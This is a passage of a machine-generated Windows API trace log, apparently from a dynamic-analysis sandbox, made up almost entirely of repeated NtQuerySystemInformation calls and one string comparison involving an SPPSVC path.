SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0271.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0271.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0271.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0271.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0271.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0271.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0271.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0271.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0271.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0271.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0271.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0271.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0271.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0271.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0271.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0271.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0271.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0271.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0271.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0271.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0271.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0271.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0271.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0271.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0271.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0271.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0271.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0271.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0271.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0271.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0271.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0271.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcda0, Length=0x48, ResultLength=0x0) [0271.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd00, Length=0x28, ResultLength=0x0) [0271.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd00, Length=0x28, ResultLength=0x0) [0271.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0271.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0271.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcda0, Length=0x48, ResultLength=0x0) [0271.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd00, Length=0x28, ResultLength=0x0) [0271.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd00, Length=0x28, ResultLength=0x0) [0271.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x40, ResultLength=0x0) [0271.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x40, ResultLength=0x0) [0271.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc70, Length=0x50, ResultLength=0x0) [0271.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc70, Length=0x50, ResultLength=0x0) [0271.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc70, Length=0x50, ResultLength=0x0) [0271.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x50, ResultLength=0x0) [0271.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x50, ResultLength=0x0) [0271.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x50, ResultLength=0x0) [0271.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x50, ResultLength=0x0) [0271.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x38, ResultLength=0x0) [0271.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8c0, Length=0x28, ResultLength=0x0) [0271.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8c0, Length=0x28, ResultLength=0x0) [0271.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8c0, Length=0x28, ResultLength=0x0) [0271.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0271.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x38, ResultLength=0x0) [0271.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x28, ResultLength=0x0) [0271.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x28, ResultLength=0x0) [0271.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x38, ResultLength=0x0) [0271.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0271.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc890, Length=0x20, ResultLength=0x0) [0271.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc890, Length=0x20, ResultLength=0x0) [0271.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc890, Length=0x20, ResultLength=0x0) [0271.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x38, ResultLength=0x0) [0271.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0271.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8a0, Length=0x20, ResultLength=0x0) [0271.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8a0, Length=0x20, ResultLength=0x0) [0271.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc70, Length=0x50, ResultLength=0x0) [0271.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc70, Length=0x50, ResultLength=0x0) [0271.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc70, Length=0x50, ResultLength=0x0) [0271.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x50, ResultLength=0x0) [0271.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x50, ResultLength=0x0) [0271.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x50, ResultLength=0x0) [0271.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x50, ResultLength=0x0) [0271.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x38, ResultLength=0x0) [0271.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8c0, Length=0x28, ResultLength=0x0) [0271.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8c0, Length=0x28, ResultLength=0x0) [0271.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8c0, Length=0x28, ResultLength=0x0) [0271.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0271.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x38, ResultLength=0x0) [0271.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x28, ResultLength=0x0) [0271.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x28, ResultLength=0x0) [0271.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x38, ResultLength=0x0) [0271.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0271.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc890, Length=0x20, ResultLength=0x0) [0271.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc890, Length=0x20, ResultLength=0x0) [0271.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc890, Length=0x20, ResultLength=0x0) [0271.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x38, ResultLength=0x0) [0271.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0271.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8a0, Length=0x20, ResultLength=0x0) [0271.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8a0, Length=0x20, ResultLength=0x0) [0271.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd20, Length=0x50, ResultLength=0x0) [0271.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x28, ResultLength=0x0) [0271.716] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0271.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd20, Length=0x50, ResultLength=0x0) [0271.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd20, Length=0x50, ResultLength=0x0) [0271.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd20, Length=0x50, ResultLength=0x0) [0271.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc50, Length=0x38, ResultLength=0x0) [0271.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x28, ResultLength=0x0) [0271.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x28, ResultLength=0x0) [0271.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x28, ResultLength=0x0) [0271.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcaf0, Length=0x28, ResultLength=0x0) [0271.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.721] 